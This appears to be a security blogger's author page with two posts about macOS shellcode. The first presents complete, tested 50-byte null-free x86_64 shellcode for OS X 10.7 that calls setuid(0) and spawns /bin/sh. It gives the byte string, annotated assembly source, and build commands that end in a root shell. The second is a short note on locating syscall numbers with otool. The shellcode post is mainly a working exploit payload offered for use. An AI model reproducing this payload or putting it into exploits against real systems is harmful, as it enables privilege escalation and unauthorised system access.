Dustin Schultz

(45 comments, 58 posts)

I work as a lead software engineer by day and as a 'computer security nut' by night. I have a Bachelors and a Masters degree in Computer Science. Somebody please send me to Blackhat 2012 damn it!

Posts by Dustin Schultz

50 Byte x86_64 OS X setuid execve Null Free Shellcode

1 month ago

by Dustin Schultz in Security, Security Development

More smaller shellcode, this time, tested and verified working on OSX 10.7.

Shellcode

/*
 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *
 *  Created on: Apr 12, 2012
 *      Author: Dustin Schultz - TheXploit.com
 */
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
"\x0f\x05";

Source

; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
mov r8b, 0x02                   ; Unix class system calls = 2
shl r8, 24                      ; shift left 24 to the upper order bits
or r8, 0x17                     ; setuid = 23, or with class = 0x2000017
xor edi, edi                    ; zero out edi, uid = 0
mov rax, r8                     ; syscall number in rax
; mov rax, 0x2000017
syscall                         ; invoke kernel
add r8, 0x24                    ; 0x24+r8=0x200003b
mov rax, r8                     ; syscall number in rax
xor rdx, rdx                    ; zero out rdx, null terminator
; mov rax, 0x200003b
mov rdi, 0x68732f2f6e69622f     ; /bin//sh in hex
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rdi, rsp                    ; null terminated /bin/sh pointer
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rsi, rsp                    ; null terminated /bin/sh pointer
syscall                         ; invoke kernel

To test:

dustin@sholtz:~/$ nasm -f macho64 shell.s
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out
bash-3.2#

Bytes from otool:

dustin@sholtz:~/$ otool -t a.out
a.out:
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6
0000000100000fb6 0f 05

Enjoy!

shellcode

Finding the syscall implementations in OS X

1 month ago

by Dustin Schultz in Security Development

This is mainly just a little note for myself. Sometimes when I’m writing shellcode, I’m interested in how OS X implements the syscalls internally. It’s easy to find out with a command like this:

dustin@sholtz:~$ otool -tv /usr/lib/system/libsystem_kernel.dylib | grep -A10 execve
___mac_execve:
0000000000016898	movl	$0x0200017c,%eax
000000000001689d	movq	%rcx,%r10
00000000000168a0	syscall
00000000000168a2	jae	0x000168a9
00000000000168a4	jmp	0x00017ffc
00000000000168a9	ret
00000000000168aa	nop
00000000000168ab	nop
___mac_get_fd:
00000000000168ac	movl	$0x02000184,%eax
--
_execve:
00000000000173e0	movl	$0x0200003b,%eax
00000000000173e5	movq	%rcx,%r10
00000000000173e8	syscall
00000000000173ea	jae	0x000173f1
00000000000173ec	jmp	0x00017ffc
00000000000173f1	ret
00000000000173f2	nop
00000000000173f3	nop
_fchdir:
00000000000173f4	movl	$0x0200000d,%eax
dustin@sholtz:~$

This will find the execve syscall implementation. I still haven’t figured out where the parameters are getting setup but this is definitely where the syscall number is getting moved into rax. It moves whatever was in rcx because it gets smashed by the kernel when syscall is invoked.

Dustin Schultz's RSS Feed

Go to Top